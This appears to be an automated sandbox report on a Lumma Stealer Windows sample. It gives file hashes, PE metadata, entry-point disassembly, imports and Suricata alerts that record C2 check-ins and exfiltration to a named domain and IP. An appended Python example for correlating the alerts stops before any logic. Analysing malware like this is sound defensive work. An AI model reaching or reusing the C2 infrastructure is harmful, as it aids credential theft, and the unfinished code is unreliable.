                                                                                              Malicious:true
                                                                                              Reputation:low
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.2.5.2.8.6.2.1.8.5.8.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.2.5.2.8.6.6.4.0.4.5.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.7.b.8.5.c.a.-.6.8.4.6.-.4.0.b.1.-.b.6.5.b.-.a.d.b.0.d.5.d.5.b.d.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.0.c.5.d.d.c.-.b.f.8.a.-.4.9.2.1.-.8.e.5.f.-.5.6.b.3.5.9.0.d.b.4.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.6.A.0.1.X.a.e.E.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.3.8.-.0.0.0.1.-.0.0.1.4.-.5.2.7.8.-.6.c.9.b.8.6.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.5.8.0.9.e.2.a.d.6.8.e.5.d.d.f.4.9.a.8.4.3.8.5.b.1.d.f.d.8.7.9.0.0.0.0.f.f.f.f.!.0.0.0.0.e.d.d.4.a.2.c.d.a.6.8.2.4.5.6.0.6.4.6.5.c.9.2.0.a.d.8.2.4.d.8.e.e.d.5.d.0.c.5.6.!.k.6.A.0.1.X.a.e.E.n...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 19:54:46 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):48458
                                                                                              Entropy (8bit):2.577745698358565
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:DlRKqvo7/QCTBqFL2d8f0r8wCbyvA2ukh:xDSRTB6IFC23ukh
                                                                                              MD5:E5FB3628BC566F6E3586AA2A3374B1E4
                                                                                              SHA1:3AA51D014A99ED48DC5D6E219CF695888693100D
                                                                                              SHA-256:B328E96DC3CEAEEC15834E6533E1566D939DEB5913357EB257327FF9CAA67B15
                                                                                              SHA-512:A2C8BC3AD6367DFDBF5E525993C6E36CA0623C3734B72ED10204CD0CF272EF2D851AF96356BA4E0517DD95FB4E5036286A4CD22DB0871C5CC513397DE71DB398
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:MDMP..a..... ........(cg............4...............H.......,....!...........3..........`.......8...........T...........hC...y..........4".......... $..............................................................................eJ.......$......GenuineIntel............T.......8...c(cg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8324
                                                                                              Entropy (8bit):3.6995929267912406
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R6l7wVeJ2/6046Y9SSUuxwbgmf+SUpDG89b/6sf3GVm:R6lXJ26j6YISU8wbgmf+S2/Zf31
                                                                                              MD5:24804AEA409F8B1B100904D14C95BFD2
                                                                                              SHA1:FB22B0F0F0965E8BF63E7DC1EE7760D4D570512B
                                                                                              SHA-256:2B90C0CB9A59B62CB541C2C693E80EC064606560D80F884C19BA9EE1E3E3AB5D
                                                                                              SHA-512:7F189CD397F0B319C87115A5FB317970EDFAD438F005AEA2A758947281D1B5384E14D18D4AC40F77B1E79C010B4748E47D581E98FB425FA1D49D0D979C6EA25A
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.3.6.<./.P.i.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4579
                                                                                              Entropy (8bit):4.457832194712016
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsXJg77aI9cnWpW8VYOYm8M4JxKOMFVZi+q8M5pACk3PcPzYPpd:uIjf5I7CW7VWJyiM3CzOpd
                                                                                              MD5:3F376C375CE0A6AFC84AC0FE2D5A6D65
                                                                                              SHA1:664483EA0AE549D2E934807CDDADFB0557375067
                                                                                              SHA-256:2746ED7AC31908B763671DC76BE6F607626B623792AAE590876A772552469CA9
                                                                                              SHA-512:4FB83111733D31F76C072EA94B5A0826BB5C3AE5595E3153F39E5F6178163B25A67EFF8662F014AAFBE2ED92DF443263688CAB6533705F4E732A57F7EBDDE346
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637137" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.4654132144536565
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:zIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNedwBCswSbC:kXD94+WlLZMM6YFHs+C
                                                                                              MD5:5BBAF019D802E854AB533741752766F3
                                                                                              SHA1:468949FB1347C17E06A674E1D151346FF7067E1A
                                                                                              SHA-256:E5A5E6525F772098C95C63CC619D7F94573901AB5A2C825AF44CE0F0EC241A9B
                                                                                              SHA-512:0453E0705F73DDBE4EDC4B00516E6AE9C5DBBFC4F2B5919E5D5784E817F2277485E471B806D1D314C4C0C7FA05A39045B0B54B8E733FC2DC3625D0B18D28F10F
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..+..Q...............................................................................................................................................................................................................................................................................................................................................`<.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.679527391728973
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:k6A01XaeEn.exe
                                                                                              File size:368'640 bytes
                                                                                              MD5:fd5fe344fef63284ed51951698535fca
                                                                                              SHA1:edd4a2cda68245606465c920ad824d8eed5d0c56
                                                                                              SHA256:9465a7b43d43fbd350d67bb6d7720306525fc409d9189e7ac5a2ada996b08bf5
                                                                                              SHA512:dec6bb11e1018ee3ee545f5c477053a5d94fdad7709881e8dfce2a94905218621f4df787104ac8ba180e7077d8daf9ebb07da020dd174648d7d00136a81da212
                                                                                              SSDEEP:6144:O9xVifwhcOwQuXuSE9uncSOkgZaKffgACke4dBseTwdW:O9xVpumccSrKgnewI
                                                                                              TLSH:B874CF1176F1A621E7FFC6307934FAA0597FB8A26E35818F2A78265F0D703918D6170B
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.A;#..;#..;#...lK.:#..%qY.%#..%qH./#..%q^.U#......>#..;#..O#..%qW.:#..%qI.:#..%qL.:#..Rich;#..........PE..L...._.d...........
                                                                                              Icon Hash:151a111012951009
                                                                                              Entrypoint:0x401877
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x64995FF1 [Mon Jun 26 09:52:49 2023 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:607342d0c32277611749326750554d8e
                                                                                              Instruction
                                                                                              call 00007FD91CE6888Bh
                                                                                              jmp 00007FD91CE64F0Dh
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000328h
                                                                                              mov dword ptr [00446C38h], eax
                                                                                              mov dword ptr [00446C34h], ecx
                                                                                              mov dword ptr [00446C30h], edx
                                                                                              mov dword ptr [00446C2Ch], ebx
                                                                                              mov dword ptr [00446C28h], esi
                                                                                              mov dword ptr [00446C24h], edi
                                                                                              mov word ptr [00446C50h], ss
                                                                                              mov word ptr [00446C44h], cs
                                                                                              mov word ptr [00446C20h], ds
                                                                                              mov word ptr [00446C1Ch], es
                                                                                              mov word ptr [00446C18h], fs
                                                                                              mov word ptr [00446C14h], gs
                                                                                              pushfd
                                                                                              pop dword ptr [00446C48h]
                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                              mov dword ptr [00446C3Ch], eax
                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                              mov dword ptr [00446C40h], eax
                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                              mov dword ptr [00446C4Ch], eax
                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                              mov dword ptr [00446B88h], 00010001h
                                                                                              mov eax, dword ptr [00446C40h]
                                                                                              mov dword ptr [00446B3Ch], eax
                                                                                              mov dword ptr [00446B30h], C0000409h
                                                                                              mov dword ptr [00446B34h], 00000001h
                                                                                              mov eax, dword ptr [00444004h]
                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                              mov eax, dword ptr [00444008h]
                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                              call dword ptr [000000C0h]
                                                                                              Programming Language:
                                                                                              • [C++] VS2008 build 21022
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [ C ] VS2008 build 21022
                                                                                              • [IMP] VS2005 build 50727
                                                                                              • [RES] VS2008 build 21022
                                                                                              • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4290c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x421000 | 0x112e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x41000 | 0x194 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3f35c | 0x3f400 | 9976381cf58d0f66c1346f9c84e59d35 | False | 0.8037765563241107 | data | 7.371498425770648 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x41000 | 0x2218 | 0x2400 | 4fb72ba1cc81a7852a7aa3706c847f3b | False | 0.3490668402777778 | data | 5.373695785620911 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x44000 | 0x3dc4bc | 0x7000 | f4844b84bde1ca15ae8869ac69c9ac02 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x421000 | 0x112e8 | 0x11400 | 7cb2356f2efa7527c98aa7827d0c9d5a | False | 0.4493744338768116 | data | 4.76016678197608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4215e0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.5101279317697228
RT_ICON | 0x422488 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.5658844765342961
RT_ICON | 0x422d30 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.6002304147465438
RT_ICON | 0x4233f8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.6394508670520231
RT_ICON | 0x423960 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.4099585062240664
RT_ICON | 0x425f08 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.4793621013133208
RT_ICON | 0x426fb0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.47704918032786886
RT_ICON | 0x427938 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.5806737588652482
RT_ICON | 0x427e18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkmen | Turkmenistan | 0.3411513859275053
RT_ICON | 0x428cc0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkmen | Turkmenistan | 0.4711191335740072
RT_ICON | 0x429568 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkmen | Turkmenistan | 0.5040322580645161
RT_ICON | 0x429c30 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkmen | Turkmenistan | 0.5158959537572254
RT_ICON | 0x42a198 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkmen | Turkmenistan | 0.42738589211618255
RT_ICON | 0x42c740 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkmen | Turkmenistan | 0.43386491557223267
RT_ICON | 0x42d7e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkmen | Turkmenistan | 0.4344262295081967
RT_ICON | 0x42e170 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkmen | Turkmenistan | 0.4521276595744681
RT_STRING | 0x42e808 | 0x386 | data | | | 0.4567627494456763
RT_STRING | 0x42eb90 | 0xb2 | data | | | 0.601123595505618
RT_STRING | 0x42ec48 | 0x6d0 | data | | | 0.4288990825688073
RT_STRING | 0x42f318 | 0x71e | data | | | 0.4313940724478595
RT_STRING | 0x42fa38 | 0x6e2 | data | | | 0.43473325766174803
RT_STRING | 0x430120 | 0x65c | data | | | 0.43611793611793614
RT_STRING | 0x430780 | 0x71a | data | | | 0.4251925192519252
RT_STRING | 0x430ea0 | 0x7c8 | data | | | 0.41967871485943775
RT_STRING | 0x431668 | 0x756 | data | | | 0.4222577209797657
RT_STRING | 0x431dc0 | 0x528 | data | | | 0.45227272727272727
RT_GROUP_ICON | 0x42e5d8 | 0x76 | data | Turkmen | Turkmenistan | 0.6694915254237288
RT_GROUP_ICON | 0x427da0 | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424
RT_VERSION | 0x42e650 | 0x1b4 | data | | | 0.5688073394495413
DLL | Import
KERNEL32.dll | SearchPathW, SetLocaleInfoA, SetErrorMode, InterlockedIncrement, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, CreatePipe, GetModuleHandleA, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, EndUpdateResourceA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
USER32.dll | GetProcessDefaultLayout
Language of compilation system | Country where language is spoken | Map
Turkmen | Turkmenistan |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T20:54:14.474132+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.4 | 64461 | 1.1.1.1 | 53 | UDP
2024-12-18T20:54:16.261976+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.261976+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.970035+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.970035+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:18.239271+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:18.239271+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:19.027809+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:19.027809+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:20.632864+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:20.632864+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:22.529357+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:24.060830+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:24.060830+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:27.078444+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:27.078444+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:32.981624+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49737 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:32.981624+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:39.281396+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49742 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:39.281396+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:46.297827+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:46.297827+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.21.99 | 443 | TCP
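Read as a sequence rather than as isolated hits, the alert table shows each outbound TLS connection from the sample reaching a different stage: SNI and JA3 matches on every connection, a check-in on the first two, and an exfiltration signature on the third. The Python below is an added example, not part of the Joe Sandbox report or of the ET ruleset: it parses the first fourteen alert rows (transcribed from the table above, pipe-delimited here), groups them by connection, lists the stages each connection reached, and pulls the domain and C2 host out as indicators. The stage labels are this example's own grouping of the SIDs, not ET metadata, and the domain is re-fanged by removing the space the report inserts.

```python
"""Correlate the report's Suricata alerts into per-connection C2 stages and IOCs (added example)."""
import re
from collections import OrderedDict
from dataclasses import dataclass

# Alert rows transcribed from the report's Suricata table (first 14 rows).
# Columns: timestamp | sid | signature | severity | src ip | src port | dst ip | dst port | proto
ALERT_ROWS = """\
2024-12-18T20:54:14.474132+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.4 | 64461 | 1.1.1.1 | 53 | UDP
2024-12-18T20:54:16.261976+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.261976+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.970035+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:16.970035+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:18.239271+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:18.239271+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:19.027809+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:19.027809+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:20.632864+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:20.632864+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:22.529357+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:24.060830+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.21.99 | 443 | TCP
2024-12-18T20:54:24.060830+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.21.99 | 443 | TCP
"""

# Stage labels are this example's own grouping of the SIDs in the table, not ET rule metadata.
STAGE_BY_SID = {
    2058360: "dns-lookup",
    2058361: "tls-sni",
    2028371: "ja3-fingerprint",
    2049836: "c2-traffic",
    2049812: "c2-traffic",
    2054653: "c2-checkin",
    2048094: "exfiltration",
}

# Matches a defanged domain in parentheses, e.g. "(discokeyus .lat" or "(discokeyus .lat in TLS SNI".
DEFANGED_DOMAIN = re.compile(r"\(([A-Za-z0-9-]+(?: ?\.[A-Za-z0-9-]+)+)")


@dataclass(frozen=True)
class Alert:
    ts: str
    sid: int
    signature: str
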